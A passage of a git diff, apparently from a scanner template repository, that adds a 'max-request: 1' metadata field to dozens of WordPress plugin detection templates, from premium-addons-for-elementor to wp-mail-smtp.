wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..975b63f5de 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..5065659e82 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..732ffbc4eb 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..12dffeb534 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..ae0e76c4bb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..b1718d1ccb 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..7543ac1d55 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4a29cecdb0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..be281d91e6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 9555d7aebd..6bd95ec077 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 180266f448..1fd64a5279 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 656ad7dfe5..648ee176ce 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7836d9554c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..ccd72e427a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3622b2c6b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..9eff765d61 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..c856e1fa9e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 0480b4b0e6..008440cc58 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..410776862f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..f210a2a2f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..f1dd1bf150 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..a9ec913599 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..d38aeb0279 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..07c43b9d80 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..83a849e11e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..c6100637d9 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: + max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1f188b66c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..2c7b16cb44 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..9d6afa8d3f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index b7ad16e281..48481fde3b 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 10fd071b0b..b34d196268 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..abec174ec3 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..e088ac07a6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..8b163200bf 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..2366a7dad7 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..71448e61e8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..717554b89f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..fba5c8b09c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..631202198e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cc953078eb 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..97ce674116 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..6d05a6f058 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..baf5af3bb5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 1d41b4ec2c..54dce49b42 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..5fae796fdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..22f812e2b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..c637006d26 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..e020507ccb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..c92903fd79 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..c25b2c1c48 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..4d6dd14d25 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7ca0870ed6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..4f0d9be568 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..f3c481b824 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..ba214fd7ea 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 